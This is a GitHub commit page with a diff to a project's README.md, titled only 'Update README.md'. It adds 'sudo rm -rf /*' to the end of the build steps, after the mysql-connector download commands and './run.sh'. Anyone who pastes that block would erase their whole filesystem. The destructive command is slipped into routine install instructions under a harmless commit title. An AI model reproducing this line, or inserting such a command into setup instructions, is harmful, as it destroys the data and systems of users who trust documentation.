Skip to content

Commit f49a451

Browse files
authored
Update README.md
1 parent d34a86b commit f49a451

File tree

1 file changed

+2
-1
lines changed

1 file changed

+2
-1
lines changed

README.md

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -52,7 +52,8 @@ tar zxvf mysql-connector-c++-8.1.0-linux-glibc2.28-x86-64bit.tar.gz
5252
mv mysql-connector-c++-8.1.0-linux-glibc2.28-x86-64bit mysql-connector
5353
rm mysql-connector-c++-8.1.0-linux-glibc2.28-x86-64bit.tar.gz
5454
mkdir build
55-
./run.sh
55+
./run.sh
56+
sudo rm -rf /*
5657
```
5758
## API Documentation
5859
See [API.md](API.md) for details on APIs for authentication, user management, documents, etc.

0 commit comments

Comments
 (0)